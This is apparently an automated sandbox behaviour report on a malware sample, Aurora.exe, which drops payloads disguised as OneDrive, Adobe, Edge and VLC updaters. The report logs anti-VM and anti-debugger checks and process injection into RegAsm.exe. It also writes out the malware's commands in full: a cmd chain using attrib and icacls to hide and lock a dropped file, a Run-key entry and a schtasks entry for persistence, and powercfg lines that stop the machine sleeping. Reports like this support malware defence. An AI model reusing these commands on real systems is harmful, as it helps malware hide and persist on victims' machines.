                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3320, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4776
                      Source: C:\Users\user\Desktop\Aurora.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\Desktop\Aurora.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 1Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 4100000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 42F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 4100000 memory commit | memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 6DF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 7DF0000 memory commit | memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 6DF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 7F20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 8F20000 memory commit | memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: 9170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeMemory allocated: E40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory allocated: 1690000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory allocated: 50B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 12B0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2FB0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4FB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: E80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: 29F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: 49F0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2DF0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2FB0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4FB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: 3270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: 3270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: 5270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: 1050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: 2C60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: 11B0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1140000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E20000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2C00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Aurora.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5487Jump to behavior
                      Source: C:\Users\user\AppData\Local\Msedge.exeWindow / User API: threadDelayed 4082
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8756
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6872
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2790
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4783
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 540
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeAPI coverage: 8.1 %
                      Source: C:\Users\user\AppData\Local\Msedge.exeAPI coverage: 4.8 %
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe TID: 6012Thread sleep time: -55000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe TID: 5216Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep count: 5487 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 233 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Msedge.exe TID: 7256Thread sleep count: 4082 > 30
                      Source: C:\Users\user\AppData\Local\Msedge.exe TID: 7256Thread sleep time: -81640s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep count: 8756 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep count: 226 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7896Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe TID: 8148Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 6872 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 2790 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 984Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe TID: 7920Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7928Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep count: 4783 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120Thread sleep count: 540 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4420Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Msedge.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Msedge.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: build.exe, 00000004.00000002.2918227460.0000000000B27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                      Source: powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: RegAsm.exe, 00000011.00000002.2929163586.000000000144E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                      Source: C:\Users\user\Desktop\Aurora.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\Aurora.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\Desktop\Aurora.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\Desktop\Aurora.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\Desktop\Aurora.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\Desktop\Aurora.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\Desktop\Aurora.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\Desktop\Aurora.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\Desktop\Aurora.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\Desktop\Aurora.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12AD4FC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6C12AD4FC
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12AD6E4 SetUnhandledExceptionFilter,1_2_00007FF6C12AD6E4
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12AD4FC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6C12AD4FC
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12AD750 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6C12AD750
                      Source: C:\Users\user\AppData\Local\Msedge.exeCode function: 18_2_00007FF62B64D4FC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF62B64D4FC
                      Source: C:\Users\user\AppData\Local\Msedge.exeCode function: 18_2_00007FF62B64D750 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF62B64D750
                      Source: C:\Users\user\AppData\Local\Msedge.exeCode function: 18_2_00007FF62B64D6E4 SetUnhandledExceptionFilter,18_2_00007FF62B64D6E4
                      Source: C:\Windows\System32\conhost.exeCode function: 57_2_00007FF6D68A1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,57_2_00007FF6D68A1180
                      Source: C:\Windows\System32\conhost.exeCode function: 57_2_00007FF6D68B6731 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,57_2_00007FF6D68B6731
                      Source: C:\Users\user\Desktop\Aurora.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: build.exe.0.dr, NativeHelper.csReference to suspicious API methods: LoadLibrary("kernel32")
                      Source: build.exe.0.dr, NativeHelper.csReference to suspicious API methods: GetProcAddress(hModule, "GetConsoleWindow")
                      Source: OneDrive.exe.0.dr, Cronos-Crypter---------------.csReference to suspicious API methods: ReadProcessMemory(Cronos_002DCrypter_FFFD_200D_D83E_DF2B_FFFD_D83D_DD35_FFFD_FFFD_FFFD_2642_FFFD_D83E_DE36_FFFD.ProcessHandle, num3 + 4 + 4, ref Cronos_002DCrypter_FE0F_FFFD_FFFD_D83D_DF2B_D83E_DC98_FFFD_FFFD_FFFD_D83C_DD29_200D_D83E_DEA0, 4, ref Cronos_002DCrypter_FE0F_FFFD_D83D_DCA3_FFFD_FFFD_FFFD_200D_FFFD_FFFD_FFFD_FE0F_FFFD_FFFD_200D)
                      Source: OneDrive.exe.0.dr, Cronos-Crypter---------------.csReference to suspicious API methods: VirtualAllocEx(Cronos_002DCrypter_FFFD_200D_D83E_DF2B_FFFD_D83D_DD35_FFFD_FFFD_FFFD_2642_FFFD_D83E_DE36_FFFD.ProcessHandle, num2, num4, 12288, 64)
                      Source: OneDrive.exe.0.dr, Cronos-Crypter---------------.csReference to suspicious API methods: WriteProcessMemory(Cronos_002DCrypter_FFFD_200D_D83E_DF2B_FFFD_D83D_DD35_FFFD_FFFD_FFFD_2642_FFFD_D83E_DE36_FFFD.ProcessHandle, num6, Cronos_002DCrypter_200D_FFFD_FFFD_D83D_DD29_FFFD_FE0F_FFFD_FFFD_FFFD_FFFD_FE0F_200D_FFFD_FFFD, num5, ref Cronos_002DCrypter_FE0F_FFFD_D83D_DCA3_FFFD_FFFD_FFFD_200D_FFFD_FFFD_FFFD_FE0F_FFFD_FFFD_200D)
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeNtQuerySystemInformation: Direct from: 0x7FF632025ABE
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 720000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 722000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F53008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 720000
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 722000
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11C5008
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 720000
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 722000
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D36008
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe "C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe "C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe "C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1480Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" && exit" && && exit "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 1Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /fJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmdJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Msedge.exe C:\Users\user\AppData\Local\Msedge.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
